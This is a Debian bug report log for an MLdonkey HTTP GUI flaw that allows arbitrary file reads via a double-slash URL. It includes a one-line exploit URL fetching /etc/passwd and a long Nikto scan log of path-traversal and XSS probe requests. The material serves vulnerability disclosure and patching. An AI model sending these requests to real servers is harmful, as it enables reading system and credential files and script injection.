Debian Bug report logs - #516829
Http double slash request arbitrary file access vulnerability

version graph

Package: mldonkey-server; Maintainer for mldonkey-server is Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>; Source for mldonkey-server is src:mldonkey.

Reported by: Giuseppe Iuculano <giuseppe@iuculano.it>

Date: Mon, 23 Feb 2009 21:15:04 UTC

Severity: grave

Tags: security

Found in version mldonkey/2.9.5-2

Fixed in versions mldonkey/3.0.0-1, mldonkey/2.9.5-2+lenny1

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 23 Feb 2009 21:15:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 23 Feb 2009 21:15:06 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Giuseppe Iuculano <giuseppe@iuculano.it>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Http double slash request arbitrary file access vulnerability
Date: Mon, 23 Feb 2009 22:12:18 +0100
Package: mldonkey-server
Version: 2.9.5-2
Severity: grave
Tags: security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Hi,

MLdonkey (up to 2.9.7) has  a  vulnerability  that allows remote user to
access any
file   with   rights   of  running  Mldonkey  daemon  by  supplying  a
special-crafted  request  (ok,  there's  not much special about double
slash) to an Mldonkey http GUI (tcp/4080 usually).

Reference:
https://savannah.nongnu.org/bugs/?25667

Thus, the exploit would be as simple as accessing any file on a remote
host with your browser and double slash:

http://mlhost:4080//etc/passwd




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkmjETEACgkQNxpp46476arOowCfdUi6Nmhi0vagcdOb06ya/RRA
RWsAn1THtf88DUbVAL6dunEq4MeLJjWn
=elDe
-----END PGP SIGNATURE-----




Bug no longer marked as found in version 2.8.1-2etch1. Request was from Giuseppe Iuculano <giuseppe@iuculano.it> to control@bugs.debian.org. (Mon, 23 Feb 2009 23:03:02 GMT) Full text and rfc822 format available.

Tags added: pending Request was from Samuel Mimram <smimram@debian.org> to control@bugs.debian.org. (Tue, 24 Feb 2009 09:00:03 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Tue, 24 Feb 2009 22:27:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to spiralvoice@web.de:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 24 Feb 2009 22:27:08 GMT) Full text and rfc822 format available.

Message #14 received at 516829@bugs.debian.org (full text, mbox):

From: spiralvoice@web.de
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 24 Feb 2009 23:24:37 +0100
Precedence: fm-user
Organization: http://freemail.web.de/
X-Provags-Id: V01U2FsdGVkX18MGPaZ0kB3jqxzdFla//RhZdDlbKT4+SAB4XLEDVKbdXOQa
 1u9MI7D5wri8mOa6iWhkob6qhR9aWJBTcu4RmAmqYm3XYGi218Q34BV1nnIY
 A==
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable

Hi,

this security bug is present in MLDonkey >=3D 2.8.4 to <=3D 2.9.7 and was fixe=
d today in MLDonkey 3.0.0.

Cheers, spiralvoice

=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Psssst! Schon vom neuen WEB.DE MultiMessenger geh=F6rt=3F=20
Der kann`s mit allen: http://www.produkte.web.de/messenger/=3Fdid=3D3123





Information stored :
Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 14:30:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>:
Extra info received and filed, but not forwarded. (Tue, 10 Mar 2009 14:30:05 GMT) Full text and rfc822 format available.

Message #19 received at 516829-quiet@bugs.debian.org (full text, mbox):

From: Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>
To: 516829-quiet@bugs.debian.org
Subject: [Fwd: mldonkey-server: MLDokney doble slash http arbitrary file access and XSS]
Date: Tue, 10 Mar 2009 15:27:17 +0100
[Message part 1 (text/plain, inline)]
Followup-For: Bug #516829

Following-up the follow-up :)

-------- Original Message --------
Subject: mldonkey-server: MLDokney doble slash http arbitrary file
access and 	XSS
Resent-Date: Tue, 10 Mar 2009 07:57:21 +0000 (UTC)
Resent-From: debian-ocaml-maint@lists.debian.org
Date: Tue, 10 Mar 2009 05:41:36 -0200
From: Facundo M. de la Cruz <fmdlc@debian-ar.org>
To: debian-ocaml-maint@lists.debian.org

Subject: mldonkey-server: MLDokney doble slash http arbitrary file access
Followup-For: Bug #516829
Package: mldonkey-server
Version: 2.9.5-2

*** Please type your report below this line ***

Hi, i want report this bug in mldonkey daemon. I send the nikto
(security http scan) output for your study.
Thanks


-- System Information:
Debian Release: 5.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.28.6
Locale: LANG=es_AR.UTF-8, LC_CTYPE=es_AR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/local/bin/bash

Versions of packages mldonkey-server depends on:
ii  adduser                3.110             add and remove users and groups
ii  debconf [debconf-2.0]  1.5.24            Debian configuration
management sy
ii  dpkg                   1.14.25           Debian package management
system
ii  libc6                  2.7-18            GNU C Library: Shared libraries
ii  libfreetype6           2.3.7-2           FreeType 2 font engine,
shared lib
ii  libgcc1                1:4.3.2-1.1       GCC support library
ii  libgd2-noxpm           2.0.36~rc1~dfsg-3 GD Graphics Library version
2 (wit
ii  libjpeg62              6b-14             The Independent JPEG
Group's JPEG
ii  libpng12-0             1.2.27-2          PNG library - runtime
ii  libstdc++6             4.3.2-1.1         The GNU Standard C++ Library v3
ii  mime-support           3.44-1            MIME files 'mime.types' &
'mailcap
ii  ucf                    3.0016            Update Configuration File:
preserv
ii  zlib1g                 1:1.2.3.3.dfsg-12 compression library - runtime

mldonkey-server recommends no packages.

Versions of packages mldonkey-server suggests:
pn  makejail                      <none>     (no description available)

-- debconf information:
  mldonkey-server/password: (password omitted)
  mldonkey-server/repassword: (password omitted)
  mldonkey-server/max_hard_download_rate: 0
* mldonkey-server/launch_at_startup: true
  mldonkey-server/run_as_user: mldonkey
  mldonkey-server/reown_file: false
  mldonkey-server/mldonkey_group: mldonkey
  mldonkey-server/mldonkey_niceness: 0
  mldonkey-server/false_password:
  mldonkey-server/fasttrack_problem:
  mldonkey-server/mldonkey_dir: /var/lib/mldonkey
  mldonkey-server/mldonkey_move: false
  mldonkey-server/max_hard_upload_rate: 0


-- 
Facundo M. de la Cruz
Consultor IT
http://www.codigounix.com.ar/

GnuPG Fingerprint:
B24D F51D 4253 3890 EDCE  87E7 EF2D 6E1C 083D 55C9

/dev/tty0

"...No hay camino hacia la libertad, la libertad es el camino..."


-- 
Mehdi Dogguy مهدي الدقي
http://www.pps.jussieu.fr/~dogguy
Tel.: (+33).1.44.27.28.38
[mldonkey-server-nikto.txt (text/plain, inline)]
---------------------------------------------------------------------------
- Nikto 2.02/2.03     -     cirt.net
+ Target IP:       127.0.0.1
+ Target Hostname: localhost
+ Target Port:     4080
+ Start Time:      2009-03-11 4:27:04
---------------------------------------------------------------------------
+ Server: MLdonkey
+ OSVDB-0: GET ///etc/passwd : The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-0: GET ///etc/hosts : The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-0: GET /../../../../../../../../../../etc/passwd : It is possible to read files on the server by adding ../ in front of file name.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</script> : The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp : Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> : The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-0: GET /nosuchurl/><script>alert('Vulnerable')</script> : JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-0: GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.asp : Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /user.php?op=userinfo&uname=<script>alert('hi');</script> : The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.
+ OSVDB-0: GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> : MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: POST /servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> : Open Market Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</script> : Search agent allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.
+ OSVDB-0: GET /samples/search.dll?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpimageview.php?pic=javascript:alert('Vulnerable') : PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ OSVDB-0: GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to Cross Site Scripting (XSS), upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> : phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> : Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.
+ OSVDB-0: GET /node/view/666\"><script>alert(document.domain)</script> : Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> : RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ OSVDB-0: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= : myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent : myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> : OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> : This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> : Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /mailman/listinfo/<script>alert('Vulnerable')</script> : Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.
+ OSVDB-0: GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
